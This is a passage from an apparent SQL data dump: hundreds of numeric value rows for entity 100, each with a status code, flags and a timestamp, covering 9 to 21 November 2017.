18:09:09'),(91,100,1,0,0,'2017-11-09 18:10:06'),(92,100,8,0,0,'2017-11-09 18:10:26'),(93,100,1,0,1,'2017-11-09 18:32:22'),(94,100,8,0,0,'2017-11-09 18:32:33'),(95,100,1,0,1,'2017-11-09 18:44:35'),(96,100,8,0,0,'2017-11-09 18:44:45'),(97,100,1,0,1,'2017-11-09 19:31:14'),(98,100,8,0,0,'2017-11-09 19:31:31'),(99,100,1,0,1,'2017-11-09 19:42:09'),(100,100,8,0,0,'2017-11-09 19:42:13'),(101,100,1,0,1,'2017-11-09 19:50:40'),(102,100,8,0,0,'2017-11-09 19:51:44'),(103,100,1,0,1,'2017-11-09 20:28:39'),(104,100,8,0,0,'2017-11-09 20:28:48'),(105,100,1,0,1,'2017-11-09 20:36:53'),(106,100,8,0,0,'2017-11-09 20:37:10'),(107,100,1,0,0,'2017-11-09 20:38:26'),(108,100,8,0,0,'2017-11-09 20:38:31'),(109,100,1,0,1,'2017-11-09 21:07:22'),(110,100,8,0,0,'2017-11-09 21:08:23'),(111,100,1,0,1,'2017-11-09 21:27:00'),(112,100,8,0,0,'2017-11-09 21:27:06'),(113,100,1,0,0,'2017-11-09 21:33:13'),(114,100,8,0,0,'2017-11-09 21:33:26'),(115,100,1,0,1,'2017-11-09 21:53:21'),(116,100,8,0,0,'2017-11-09 21:53:29'),(117,100,1,0,1,'2017-11-09 21:55:39'),(118,100,8,0,0,'2017-11-09 21:55:42'),(119,100,1,0,0,'2017-11-09 21:55:48'),(120,100,8,0,0,'2017-11-09 21:55:51'),(121,100,1,0,1,'2017-11-09 22:04:57'),(122,100,8,0,0,'2017-11-09 22:05:44'),(123,100,1,0,1,'2017-11-09 22:20:44'),(124,100,8,0,0,'2017-11-09 22:22:20'),(125,100,1,0,0,'2017-11-09 22:23:27'),(126,100,8,0,0,'2017-11-09 22:23:54'),(127,100,1,0,0,'2017-11-09 22:24:11'),(128,100,8,0,0,'2017-11-09 22:24:13'),(129,100,1,0,0,'2017-11-09 22:25:09'),(130,100,8,0,0,'2017-11-09 22:25:11'),(131,100,1,0,0,'2017-11-09 22:26:01'),(132,100,1,0,0,'2017-11-09 22:26:02'),(133,100,1,0,0,'2017-11-09 22:26:06'),(134,100,8,0,0,'2017-11-09 22:26:10'),(135,100,1,0,1,'2017-11-09 22:37:05'),(136,100,1,0,1,'2017-11-09 22:50:59'),(137,100,1,0,1,'2017-11-09 22:51:26'),(138,100,8,0,0,'2017-11-09 22:51:38'),(139,100,1,0,0,'2017-11-09 22:52:15'),(140,100,8,0,0,'2017-11-09 22:52:17'),(141,100,1,0,1,'2017-11-09 22:55:15'),(142,100,8,0,0,'2017-11-09 22:55:33'),(143,100,1,0,0,'2017-11-09 22:57:20'),(144,100,8,0,0,'2017-11-09 22:57:27'),(145,100,1,0,0,'2017-11-09 22:58:34'),(146,100,1,0,1,'2017-11-09 23:35:54'),(147,100,1,0,1,'2017-11-09 23:42:43'),(148,100,8,0,0,'2017-11-09 23:42:46'),(149,100,1,0,1,'2017-11-10 00:13:40'),(150,100,8,0,0,'2017-11-10 00:14:29'),(151,100,1,0,1,'2017-11-10 06:26:15'),(152,100,8,0,0,'2017-11-10 06:26:23'),(153,100,1,0,1,'2017-11-10 06:32:26'),(154,100,1,0,0,'2017-11-10 06:32:39'),(155,100,8,0,0,'2017-11-10 06:32:42'),(156,100,1,0,1,'2017-11-10 06:53:52'),(157,100,8,0,0,'2017-11-10 06:53:58'),(158,100,1,0,1,'2017-11-10 07:02:21'),(159,100,1,0,0,'2017-11-10 07:02:44'),(160,100,8,0,0,'2017-11-10 07:03:06'),(161,100,1,0,1,'2017-11-10 07:38:47'),(162,100,8,0,0,'2017-11-10 07:38:55'),(163,100,1,0,1,'2017-11-10 09:01:55'),(164,100,8,0,0,'2017-11-10 09:03:04'),(165,100,1,0,0,'2017-11-10 09:07:19'),(166,100,8,0,0,'2017-11-10 09:07:38'),(167,100,1,0,0,'2017-11-10 09:07:43'),(168,100,8,0,0,'2017-11-10 09:07:49'),(169,100,1,0,0,'2017-11-10 09:07:57'),(170,100,1,0,0,'2017-11-10 09:11:42'),(171,100,8,0,0,'2017-11-10 09:11:49'),(172,100,1,0,0,'2017-11-10 09:12:53'),(173,100,8,0,0,'2017-11-10 09:12:57'),(174,100,1,0,0,'2017-11-10 09:13:40'),(175,100,8,0,0,'2017-11-10 09:15:10'),(176,100,1,0,0,'2017-11-10 09:15:56'),(177,100,8,0,0,'2017-11-10 09:16:06'),(178,100,1,0,1,'2017-11-10 09:18:04'),(179,100,1,0,1,'2017-11-10 09:45:48'),(180,100,8,0,0,'2017-11-10 09:45:50'),(181,100,8,0,0,'2017-11-10 10:00:34'),(182,100,1,0,1,'2017-11-10 12:00:57'),(183,100,8,0,0,'2017-11-10 12:01:06'),(184,100,1,0,1,'2017-11-10 12:23:17'),(185,100,8,0,0,'2017-11-10 12:23:21'),(186,100,1,0,1,'2017-11-10 12:23:55'),(187,100,8,0,0,'2017-11-10 12:24:00'),(188,100,1,0,1,'2017-11-10 12:47:57'),(189,100,8,0,0,'2017-11-10 12:48:10'),(190,100,1,0,1,'2017-11-10 13:22:23'),(191,100,8,0,0,'2017-11-10 13:22:26'),(192,100,1,0,1,'2017-11-10 13:22:51'),(193,100,8,0,0,'2017-11-10 13:22:59'),(194,100,1,0,1,'2017-11-10 13:35:07'),(195,100,8,0,0,'2017-11-10 13:35:14'),(196,100,1,0,1,'2017-11-10 13:37:27'),(197,100,8,0,0,'2017-11-10 13:37:29'),(198,100,1,0,1,'2017-11-10 13:54:44'),(199,100,8,0,0,'2017-11-10 13:54:47'),(200,100,1,0,1,'2017-11-10 14:18:58'),(201,100,8,0,0,'2017-11-10 14:19:00'),(202,100,1,0,1,'2017-11-10 15:00:31'),(203,100,8,0,0,'2017-11-10 15:00:46'),(204,100,1,0,1,'2017-11-10 15:37:38'),(205,100,8,0,0,'2017-11-10 15:37:48'),(206,100,1,0,1,'2017-11-10 16:20:32'),(207,100,8,0,0,'2017-11-10 16:20:34'),(208,100,1,0,1,'2017-11-10 16:46:29'),(209,100,8,0,0,'2017-11-10 16:46:30'),(210,100,1,0,1,'2017-11-10 17:48:05'),(211,100,8,0,0,'2017-11-10 17:48:07'),(212,100,1,0,1,'2017-11-10 18:05:20'),(213,100,8,0,0,'2017-11-10 18:05:22'),(214,100,1,0,1,'2017-11-10 18:41:53'),(215,100,8,0,0,'2017-11-10 18:41:54'),(216,100,1,0,1,'2017-11-10 19:18:25'),(217,100,1,0,1,'2017-11-10 20:17:26'),(218,100,8,0,0,'2017-11-10 20:18:07'),(219,100,1,0,1,'2017-11-10 23:24:41'),(220,100,8,0,0,'2017-11-10 23:24:41'),(221,100,1,0,1,'2017-11-10 23:31:18'),(222,100,8,0,0,'2017-11-10 23:31:21'),(223,100,1,0,1,'2017-11-11 00:20:23'),(224,100,8,0,0,'2017-11-11 00:20:25'),(225,100,1,0,1,'2017-11-11 08:06:05'),(226,100,8,0,0,'2017-11-11 08:06:06'),(227,100,1,0,1,'2017-11-11 10:10:23'),(228,100,8,0,0,'2017-11-11 10:10:26'),(229,100,1,0,1,'2017-11-11 10:45:38'),(230,100,8,0,0,'2017-11-11 10:46:06'),(231,100,1,0,1,'2017-11-11 11:00:17'),(232,100,1,0,1,'2017-11-11 11:03:40'),(233,100,1,0,1,'2017-11-11 11:09:35'),(234,100,8,0,0,'2017-11-11 11:09:37'),(235,100,1,0,1,'2017-11-11 13:35:58'),(236,100,8,0,0,'2017-11-11 13:36:07'),(237,100,1,0,1,'2017-11-11 14:53:34'),(238,100,8,0,0,'2017-11-11 14:53:42'),(239,100,1,0,1,'2017-11-11 19:12:00'),(240,100,8,0,0,'2017-11-11 19:12:06'),(241,100,1,0,1,'2017-11-11 19:54:54'),(242,100,8,0,0,'2017-11-11 19:54:56'),(243,100,1,0,1,'2017-11-11 20:07:23'),(244,100,8,0,0,'2017-11-11 20:07:26'),(245,100,1,0,1,'2017-11-11 20:09:09'),(246,100,8,0,0,'2017-11-11 20:09:11'),(247,100,1,0,1,'2017-11-11 20:36:45'),(248,100,1,0,1,'2017-11-11 20:37:26'),(249,100,1,0,1,'2017-11-11 20:38:15'),(250,100,8,0,0,'2017-11-11 20:38:17'),(251,100,8,0,0,'2017-11-11 20:53:28'),(252,100,1,0,1,'2017-11-11 21:12:39'),(253,100,8,0,0,'2017-11-11 21:12:43'),(254,100,1,0,1,'2017-11-11 21:21:51'),(255,100,8,0,0,'2017-11-11 21:21:55'),(256,100,1,0,1,'2017-11-11 21:23:46'),(257,100,8,0,0,'2017-11-11 21:25:34'),(258,100,1,0,1,'2017-11-11 22:11:55'),(259,100,8,0,0,'2017-11-11 22:12:08'),(260,100,1,0,1,'2017-11-11 22:25:43'),(261,100,8,0,0,'2017-11-11 22:26:30'),(262,100,1,0,1,'2017-11-11 23:07:32'),(263,100,1,0,1,'2017-11-11 23:12:33'),(264,100,8,0,0,'2017-11-11 23:12:35'),(265,100,1,0,1,'2017-11-12 01:08:50'),(266,100,1,0,1,'2017-11-12 01:33:57'),(267,100,8,0,0,'2017-11-12 01:34:01'),(268,100,1,0,1,'2017-11-12 02:01:35'),(269,100,8,0,0,'2017-11-12 02:01:36'),(270,100,1,0,1,'2017-11-12 02:41:15'),(271,100,8,0,0,'2017-11-12 02:41:25'),(272,100,1,0,1,'2017-11-12 02:59:02'),(273,100,8,0,0,'2017-11-12 02:59:25'),(274,100,1,0,1,'2017-11-12 06:25:51'),(275,100,8,0,0,'2017-11-12 06:25:52'),(276,100,1,0,1,'2017-11-12 07:29:51'),(277,100,8,0,0,'2017-11-12 07:29:52'),(278,100,1,0,1,'2017-11-12 07:45:51'),(279,100,8,0,0,'2017-11-12 07:45:56'),(280,100,1,0,1,'2017-11-12 08:16:35'),(281,100,8,0,0,'2017-11-12 08:16:42'),(282,100,1,0,1,'2017-11-12 10:00:44'),(283,100,8,0,0,'2017-11-12 10:00:45'),(284,100,1,0,1,'2017-11-12 10:16:01'),(285,100,1,0,1,'2017-11-12 10:16:14'),(286,100,8,0,0,'2017-11-12 10:16:17'),(287,100,1,0,1,'2017-11-12 10:31:33'),(288,100,8,0,0,'2017-11-12 10:31:36'),(289,100,1,0,1,'2017-11-12 10:36:10'),(290,100,8,0,0,'2017-11-12 10:36:12'),(291,100,1,0,1,'2017-11-12 11:56:07'),(292,100,1,0,1,'2017-11-12 12:03:13'),(293,100,1,0,1,'2017-11-12 12:32:52'),(294,100,8,0,0,'2017-11-12 12:33:07'),(295,100,1,0,1,'2017-11-12 13:07:44'),(296,100,8,0,0,'2017-11-12 13:07:49'),(297,100,1,0,1,'2017-11-12 13:56:43'),(298,100,8,0,0,'2017-11-12 13:56:51'),(299,100,1,0,1,'2017-11-12 14:10:49'),(300,100,8,0,0,'2017-11-12 14:10:57'),(301,100,1,0,1,'2017-11-12 14:25:31'),(302,100,8,0,0,'2017-11-12 14:25:38'),(303,100,1,0,1,'2017-11-12 14:55:13'),(304,100,8,0,0,'2017-11-12 14:55:16'),(305,100,1,0,1,'2017-11-12 15:02:45'),(306,100,8,0,0,'2017-11-12 15:02:47'),(307,100,1,0,1,'2017-11-12 15:26:15'),(308,100,8,0,0,'2017-11-12 15:26:19'),(309,100,1,0,1,'2017-11-12 15:28:03'),(310,100,8,0,0,'2017-11-12 15:28:04'),(311,100,1,0,1,'2017-11-12 15:39:05'),(312,100,8,0,0,'2017-11-12 15:39:32'),(313,100,1,0,1,'2017-11-12 16:48:04'),(314,100,8,0,0,'2017-11-12 16:48:13'),(315,100,1,0,1,'2017-11-12 17:33:19'),(316,100,8,0,0,'2017-11-12 17:33:22'),(317,100,1,0,1,'2017-11-12 18:14:08'),(318,100,1,0,1,'2017-11-12 18:37:22'),(319,100,8,0,0,'2017-11-12 18:37:26'),(320,100,1,0,1,'2017-11-12 18:39:06'),(321,100,1,0,1,'2017-11-12 18:39:55'),(322,100,8,0,0,'2017-11-12 18:40:53'),(323,100,8,0,0,'2017-11-12 19:58:52'),(324,100,1,0,1,'2017-11-12 20:05:43'),(325,100,1,0,1,'2017-11-12 20:24:37'),(326,100,8,0,0,'2017-11-12 20:24:39'),(327,100,1,0,1,'2017-11-12 20:51:20'),(328,100,8,0,0,'2017-11-12 20:51:20'),(329,100,1,0,1,'2017-11-12 20:58:32'),(330,100,8,0,0,'2017-11-12 20:58:36'),(331,100,1,0,1,'2017-11-12 21:32:05'),(332,100,8,0,0,'2017-11-12 21:32:07'),(333,100,1,0,1,'2017-11-12 21:40:46'),(334,100,8,0,0,'2017-11-12 21:40:52'),(335,100,1,0,1,'2017-11-12 23:02:50'),(336,100,1,0,1,'2017-11-13 00:15:44'),(337,100,8,0,0,'2017-11-13 00:15:55'),(338,100,1,0,1,'2017-11-13 00:40:38'),(339,100,8,0,0,'2017-11-13 00:41:15'),(340,100,1,0,1,'2017-11-13 03:31:10'),(341,100,1,0,1,'2017-11-13 04:38:07'),(342,100,8,0,0,'2017-11-13 04:38:13'),(343,100,1,0,1,'2017-11-13 06:38:09'),(344,100,8,0,0,'2017-11-13 06:38:14'),(345,100,1,0,1,'2017-11-13 07:28:27'),(346,100,8,0,0,'2017-11-13 07:28:38'),(347,100,1,0,1,'2017-11-13 10:08:27'),(348,100,8,0,0,'2017-11-13 10:09:36'),(349,100,1,0,1,'2017-11-13 10:24:16'),(350,100,8,0,0,'2017-11-13 10:24:18'),(351,100,1,0,1,'2017-11-13 10:50:12'),(352,100,1,0,1,'2017-11-13 11:16:58'),(353,100,1,0,1,'2017-11-13 11:17:38'),(354,100,1,0,1,'2017-11-13 11:33:30'),(355,100,8,0,0,'2017-11-13 11:33:32'),(356,100,1,0,1,'2017-11-13 11:35:20'),(357,100,8,0,0,'2017-11-13 11:42:12'),(358,100,1,0,1,'2017-11-13 11:43:46'),(359,100,1,0,1,'2017-11-13 11:45:58'),(360,100,8,0,0,'2017-11-13 11:46:27'),(361,100,1,0,1,'2017-11-13 12:11:14'),(362,100,8,0,0,'2017-11-13 12:20:42'),(363,100,1,0,1,'2017-11-13 12:32:12'),(364,100,8,0,0,'2017-11-13 12:32:14'),(365,100,1,0,1,'2017-11-13 12:53:28'),(366,100,8,0,0,'2017-11-13 12:53:52'),(367,100,1,0,1,'2017-11-13 12:54:39'),(368,100,8,0,0,'2017-11-13 12:54:44'),(369,100,1,0,1,'2017-11-13 13:03:30'),(370,100,1,0,1,'2017-11-13 13:14:20'),(371,100,8,0,0,'2017-11-13 13:14:37'),(372,100,1,0,1,'2017-11-13 13:25:20'),(373,100,8,0,0,'2017-11-13 13:25:33'),(374,100,1,0,1,'2017-11-13 13:27:49'),(375,100,8,0,0,'2017-11-13 13:28:00'),(376,100,1,0,1,'2017-11-13 13:28:49'),(377,100,8,0,0,'2017-11-13 13:28:51'),(378,100,1,0,1,'2017-11-13 13:30:16'),(379,100,8,0,0,'2017-11-13 13:30:58'),(380,100,1,0,1,'2017-11-13 13:36:06'),(381,100,8,0,0,'2017-11-13 13:36:06'),(382,100,1,0,1,'2017-11-13 13:37:27'),(383,100,8,0,0,'2017-11-13 13:37:36'),(384,100,1,0,1,'2017-11-13 13:38:14'),(385,100,8,0,0,'2017-11-13 13:40:31'),(386,100,8,0,0,'2017-11-13 13:40:36'),(387,100,1,0,1,'2017-11-13 13:42:56'),(388,100,1,0,1,'2017-11-13 13:48:51'),(389,100,1,0,1,'2017-11-13 13:50:04'),(390,100,8,0,0,'2017-11-13 13:50:08'),(391,100,1,0,1,'2017-11-13 13:50:30'),(392,100,8,0,0,'2017-11-13 13:50:32'),(393,100,1,0,1,'2017-11-13 14:00:00'),(394,100,1,0,1,'2017-11-13 14:09:22'),(395,100,1,0,1,'2017-11-13 14:17:23'),(396,100,8,0,0,'2017-11-13 14:17:34'),(397,100,1,0,1,'2017-11-13 15:07:02'),(398,100,8,0,0,'2017-11-13 15:07:16'),(399,100,1,0,1,'2017-11-13 15:11:27'),(400,100,8,0,0,'2017-11-13 15:11:30'),(401,100,1,0,1,'2017-11-13 15:12:47'),(402,100,8,0,0,'2017-11-13 15:12:54'),(403,100,1,0,1,'2017-11-13 15:13:59'),(404,100,8,0,0,'2017-11-13 15:15:08'),(405,100,1,0,1,'2017-11-13 15:27:21'),(406,100,8,0,0,'2017-11-13 15:27:57'),(407,100,1,0,1,'2017-11-13 15:28:44'),(408,100,1,0,1,'2017-11-13 15:46:01'),(409,100,1,0,1,'2017-11-13 15:53:10'),(410,100,8,0,0,'2017-11-13 15:53:41'),(411,100,1,0,1,'2017-11-13 16:09:57'),(412,100,8,0,0,'2017-11-13 16:10:05'),(413,100,1,0,1,'2017-11-13 16:14:49'),(414,100,8,0,0,'2017-11-13 16:15:26'),(415,100,1,0,1,'2017-11-13 16:44:42'),(416,100,8,0,0,'2017-11-13 16:44:56'),(417,100,1,0,1,'2017-11-13 16:51:38'),(418,100,8,0,0,'2017-11-13 16:51:40'),(419,100,1,0,1,'2017-11-13 16:54:23'),(420,100,8,0,0,'2017-11-13 16:57:23'),(421,100,1,0,1,'2017-11-13 17:22:39'),(422,100,8,0,0,'2017-11-13 17:23:56'),(423,100,1,0,1,'2017-11-13 17:35:54'),(424,100,8,0,0,'2017-11-13 17:36:14'),(425,100,1,0,1,'2017-11-13 17:39:33'),(426,100,1,0,1,'2017-11-13 17:55:44'),(427,100,8,0,0,'2017-11-13 17:55:45'),(428,100,8,0,0,'2017-11-13 18:02:40'),(429,100,1,0,1,'2017-11-13 18:08:42'),(430,100,8,0,0,'2017-11-13 18:08:49'),(431,100,1,0,1,'2017-11-13 18:12:29'),(432,100,1,0,1,'2017-11-13 18:28:24'),(433,100,8,0,0,'2017-11-13 18:28:46'),(434,100,1,0,1,'2017-11-13 18:33:48'),(435,100,8,0,0,'2017-11-13 18:33:49'),(436,100,1,0,1,'2017-11-13 18:35:22'),(437,100,8,0,0,'2017-11-13 18:35:41'),(438,100,1,0,1,'2017-11-13 18:41:34'),(439,100,1,0,1,'2017-11-13 18:43:13'),(440,100,8,0,0,'2017-11-13 18:43:18'),(441,100,1,0,1,'2017-11-13 18:59:48'),(442,100,8,0,0,'2017-11-13 19:00:26'),(443,100,1,0,1,'2017-11-13 19:33:31'),(444,100,1,0,1,'2017-11-13 19:36:36'),(445,100,8,0,0,'2017-11-13 19:36:53'),(446,100,1,0,1,'2017-11-13 19:42:34'),(447,100,8,0,0,'2017-11-13 19:42:40'),(448,100,8,0,0,'2017-11-13 19:50:43'),(449,100,1,0,1,'2017-11-13 19:56:09'),(450,100,8,0,0,'2017-11-13 19:56:11'),(451,100,1,0,1,'2017-11-13 20:00:56'),(452,100,8,0,0,'2017-11-13 20:01:09'),(453,100,1,0,1,'2017-11-13 20:07:00'),(454,100,8,0,0,'2017-11-13 20:07:07'),(455,100,1,0,1,'2017-11-13 20:09:50'),(456,100,1,0,1,'2017-11-13 20:27:07'),(457,100,8,0,0,'2017-11-13 20:27:09'),(458,100,1,0,1,'2017-11-13 20:51:50'),(459,100,1,0,1,'2017-11-13 20:52:04'),(460,100,8,0,0,'2017-11-13 20:52:17'),(461,100,8,0,0,'2017-11-13 20:52:42'),(462,100,1,0,1,'2017-11-13 21:01:36'),(463,100,1,0,1,'2017-11-13 21:07:49'),(464,100,8,0,0,'2017-11-13 21:08:16'),(465,100,1,0,1,'2017-11-13 21:19:27'),(466,100,1,0,1,'2017-11-13 21:25:29'),(467,100,1,0,1,'2017-11-13 21:29:52'),(468,100,8,0,0,'2017-11-13 21:30:09'),(469,100,1,0,1,'2017-11-13 21:37:40'),(470,100,8,0,0,'2017-11-13 21:37:44'),(471,100,1,0,1,'2017-11-13 21:39:05'),(472,100,8,0,0,'2017-11-13 21:46:36'),(473,100,1,0,1,'2017-11-13 22:43:54'),(474,100,1,0,1,'2017-11-13 23:13:22'),(475,100,8,0,0,'2017-11-13 23:13:42'),(476,100,1,0,1,'2017-11-13 23:34:46'),(477,100,8,0,0,'2017-11-13 23:34:58'),(478,100,1,0,1,'2017-11-14 00:08:21'),(479,100,1,0,1,'2017-11-14 01:48:32'),(480,100,8,0,0,'2017-11-14 01:48:36'),(481,100,1,0,1,'2017-11-14 02:24:51'),(482,100,1,0,1,'2017-11-14 04:16:29'),(483,100,8,0,0,'2017-11-14 04:16:30'),(484,100,1,0,1,'2017-11-14 06:37:21'),(485,100,8,0,0,'2017-11-14 06:37:29'),(486,100,1,0,1,'2017-11-14 06:40:11'),(487,100,8,0,0,'2017-11-14 06:40:14'),(488,100,1,0,1,'2017-11-14 07:50:47'),(489,100,8,0,0,'2017-11-14 07:50:56'),(490,100,1,0,1,'2017-11-14 07:55:39'),(491,100,8,0,0,'2017-11-14 07:55:44'),(492,100,1,0,1,'2017-11-14 08:27:52'),(493,100,1,0,1,'2017-11-14 08:29:58'),(494,100,8,0,0,'2017-11-14 08:30:04'),(495,100,1,0,1,'2017-11-14 08:37:29'),(496,100,1,0,1,'2017-11-14 10:07:40'),(497,100,8,0,0,'2017-11-14 10:07:42'),(498,100,1,0,1,'2017-11-14 10:18:10'),(499,100,8,0,0,'2017-11-14 10:18:17'),(500,100,1,0,1,'2017-11-14 10:34:05'),(501,100,8,0,0,'2017-11-14 10:34:13'),(502,100,1,0,1,'2017-11-14 10:57:27'),(503,100,8,0,0,'2017-11-14 10:57:43'),(504,100,1,0,1,'2017-11-14 11:11:03'),(505,100,8,0,0,'2017-11-14 11:11:26'),(506,100,1,0,1,'2017-11-14 11:56:52'),(507,100,8,0,0,'2017-11-14 11:57:50'),(508,100,1,0,1,'2017-11-14 12:07:30'),(509,100,8,0,0,'2017-11-14 12:08:01'),(510,100,1,0,1,'2017-11-14 12:40:20'),(511,100,8,0,0,'2017-11-14 12:40:34'),(512,100,1,0,1,'2017-11-14 13:32:25'),(513,100,8,0,0,'2017-11-14 13:34:10'),(514,100,1,0,1,'2017-11-14 14:01:18'),(515,100,8,0,0,'2017-11-14 14:01:35'),(516,100,1,0,1,'2017-11-14 14:28:12'),(517,100,1,0,1,'2017-11-14 16:25:29'),(518,100,1,0,1,'2017-11-14 16:42:51'),(519,100,1,0,1,'2017-11-14 17:15:14'),(520,100,8,0,0,'2017-11-14 17:15:19'),(521,100,1,0,1,'2017-11-14 17:39:46'),(522,100,8,0,0,'2017-11-14 17:40:04'),(523,100,1,0,1,'2017-11-14 17:46:45'),(524,100,8,0,0,'2017-11-14 17:47:05'),(525,100,1,0,1,'2017-11-14 17:50:58'),(526,100,8,0,0,'2017-11-14 17:51:12'),(527,100,1,0,1,'2017-11-14 19:04:58'),(528,100,1,0,1,'2017-11-14 19:45:47'),(529,100,1,0,1,'2017-11-14 21:43:40'),(530,100,1,0,1,'2017-11-14 21:53:00'),(531,100,8,0,0,'2017-11-14 21:53:37'),(532,100,1,0,1,'2017-11-15 08:02:36'),(533,100,8,0,0,'2017-11-15 08:03:05'),(534,100,1,0,1,'2017-11-15 08:29:58'),(535,100,1,0,1,'2017-11-15 09:21:32'),(536,100,1,0,1,'2017-11-15 09:23:14'),(537,100,1,0,1,'2017-11-15 10:04:36'),(538,100,8,0,0,'2017-11-15 10:04:37'),(539,100,1,0,1,'2017-11-15 10:06:40'),(540,100,8,0,0,'2017-11-15 10:07:04'),(541,100,1,0,1,'2017-11-15 10:53:06'),(542,100,8,0,0,'2017-11-15 10:54:22'),(543,100,1,0,1,'2017-11-15 11:09:35'),(544,100,8,0,0,'2017-11-15 11:09:48'),(545,100,1,0,1,'2017-11-15 13:04:33'),(546,100,1,0,1,'2017-11-15 17:21:24'),(547,100,8,0,0,'2017-11-15 17:21:43'),(548,100,1,0,1,'2017-11-15 21:19:32'),(549,100,1,0,1,'2017-11-16 03:12:18'),(550,100,1,0,1,'2017-11-16 03:56:46'),(551,100,1,0,1,'2017-11-16 09:58:49'),(552,100,1,0,1,'2017-11-16 12:10:04'),(553,100,8,0,0,'2017-11-16 12:10:08'),(554,100,8,0,0,'2017-11-16 15:01:12'),(555,100,1,0,1,'2017-11-16 15:01:16'),(556,100,8,0,0,'2017-11-16 19:45:21'),(557,100,1,0,1,'2017-11-16 19:45:41'),(558,100,1,0,1,'2017-11-17 00:37:38'),(559,100,1,0,1,'2017-11-17 07:07:36'),(560,100,1,0,1,'2017-11-17 09:25:51'),(561,100,8,0,0,'2017-11-17 09:26:16'),(562,100,1,0,1,'2017-11-17 09:35:23'),(563,100,1,0,1,'2017-11-17 16:45:08'),(564,100,8,0,0,'2017-11-17 16:45:18'),(565,100,1,0,1,'2017-11-17 23:28:49'),(566,100,1,0,1,'2017-11-18 01:30:48'),(567,100,1,0,1,'2017-11-18 06:57:51'),(568,100,1,0,1,'2017-11-18 07:23:53'),(569,100,8,0,0,'2017-11-18 07:23:57'),(570,100,1,0,1,'2017-11-18 19:49:09'),(571,100,8,0,0,'2017-11-19 00:06:30'),(572,100,1,0,1,'2017-11-19 00:06:30'),(573,100,1,0,1,'2017-11-19 00:36:08'),(574,100,1,0,1,'2017-11-19 00:43:56'),(575,100,8,0,0,'2017-11-19 00:44:05'),(576,100,1,0,1,'2017-11-19 00:59:44'),(577,100,1,0,1,'2017-11-20 04:48:00'),(578,100,1,0,1,'2017-11-20 14:26:21'),(579,100,1,0,1,'2017-11-20 17:10:10'),(580,100,8,0,0,'2017-11-20 17:10:18'),(581,100,1,0,1,'2017-11-20 17:21:55'),(582,100,8,0,0,'2017-11-20 17:22:06'),(583,100,1,0,1,'2017-11-20 17:24:49'),(584,100,8,0,0,'2017-11-20 17:25:03'),(585,100,1,0,1,'2017-11-20 17:33:30'),(586,100,8,0,0,'2017-11-20 17:33:32'),(587,100,1,0,1,'2017-11-20 17:34:10'),(588,100,8,0,0,'2017-11-20 17:34:15'),(589,100,1,0,1,'2017-11-20 18:43:17'),(590,100,8,0,0,'2017-11-20 18:43:18'),(591,100,1,0,1,'2017-11-20 21:33:56'),(592,100,8,0,0,'2017-11-20 21:33:58'),(593,100,1,0,1,'2017-11-20 21:35:37'),(594,100,8,0,0,'2017-11-20 21:35:44'),(595,100,1,0,1,'2017-11-20 21:40:25'),(596,100,1,0,1,'2017-11-20 21:40:32'),(597,100,8,0,0,'2017-11-20 21:40:34'),(598,100,8,0,0,'2017-11-20 21:40:51'),(599,100,1,0,1,'2017-11-20 21:45:07'),(600,100,1,0,1,'2017-11-20 21:58:57'),(601,100,8,0,0,'2017-11-20 21:58:57'),(602,100,1,0,1,'2017-11-20 22:00:04'),(603,100,8,0,0,'2017-11-20 22:00:11'),(604,100,1,0,1,'2017-11-20 22:02:49'),(605,100,8,0,0,'2017-11-20 22:02:51'),(606,100,1,0,1,'2017-11-20 22:04:00'),(607,100,8,0,0,'2017-11-20 22:04:02'),(608,100,1,0,1,'2017-11-20 22:04:21'),(609,100,8,0,0,'2017-11-20 22:04:23'),(610,100,1,0,1,'2017-11-20 22:06:40'),(611,100,8,0,0,'2017-11-20 22:06:43'),(612,100,1,0,1,'2017-11-20 22:11:45'),(613,100,8,0,0,'2017-11-20 22:11:47'),(614,100,1,0,1,'2017-11-20 22:55:58'),(615,100,8,0,0,'2017-11-20 22:56:02'),(616,100,1,0,1,'2017-11-20 23:06:32'),(617,100,8,0,0,'2017-11-20 23:06:34'),(618,100,1,0,1,'2017-11-20 23:41:12'),(619,100,8,0,0,'2017-11-20 23:41:12'),(620,100,1,0,1,'2017-11-20 23:46:23'),(621,100,8,0,0,'2017-11-20 23:46:25'),(622,100,1,0,1,'2017-11-21 00:00:13'),(623,100,8,0,0,'2017-11-21 00:00:24'),(624,100,1,0,1,'2017-11-21 00:03:41'),(625,100,8,0,0,'2017-11-21 00:03:44'),(626,100,1,0,1,'2017-11-21 00:15:22'),(627,100,1,0,1,'2017-11-21 00:18:53'),(628,100,8,0,0,'2017-11-21 00:18:56'),(629,100,8,0,0,'2017-11-21 00:21:03'),(630,100,1,0,1,'2017-11-21 00:24:55'),(631,100,8,0,0,'2017-11-21 00:24:57'),(632,100,1,0,1,'2017-11-21 02:23:10'),(633,100,8,0,0,'2017-11-21 02:23:12'),(634,100,1,0,1,'2017-11-21 03:11:36'),(635,100,1,0,1,'2017-11-21 06:49:18'),(636,100,1,0,1,'2017-11-21 06:53:13'),(637,100,8,0,0,'2017-11-21 06:53:18'),(638,100,1,0,1,'2017-11-21 07:28:18'),(639,100,8,0,0,'2017-11-21 07:28:22'),(640,100,1,0,1,'2017-11-21 07:29:11'),(641,100,8,0,0,'2017-11-21 07:29:15'),(642,100,1,0,1,'2017-11-21 07:42:06'),(643,100,1,0,1,'2017-11-21 07:42:09'),(644,100,8,0,0,'2017-11-21 07:42:16'),(645,100,8,0,0,'2017-11-21 07:42:48'),(646,100,1,0,1,'2017-11-21 07:48:52'),(647,100,8,0,0,'2017-11-21 07:48:57'),(648,100,1,0,1,'2017-11-21 08:47:40'),(649,100,8,0,0,'2017-11-21 08:47:40'),(650,100,1,0,1,'2017-11-21 09:21:19'),(651,100,1,0,1,'2017-11-21 09:59:51'),(652,100,8,0,0,'2017-11-21 10:00:14'),(653,100,1,0,1,'2017-11-21 10:50:36'),(654,100,1,0,1,'2017-11-21 11:00:53'),(655,100,8,0,0,'2017-11-21 11:00:57'),(656,100,1,0,1,'2017-11-21 11:17:16'),(657,100,8,0,0,'2017-11-21 11:17:21'),(658,100,1,0,1,'2017-11-21 11:23:20'),(659,100,1,0,1,'2017-11-21 11:30:30'),(660,100,1,0,1,'2017-11-21 12:08:57'),(661,100,8,0,0,'2017-11-21 12:08:59'),(662,100,1,0,1,'2017-11-21 12:21:13'),(663,100,8,0,0,'2017-11-21 12:21:18'),(664,100,1,0,1,'2017-11-21 12:37:22'),(665,100,8,0,0,'2017-11-21 12:37:26'),(666,100,1,0,1,'2017-11-21 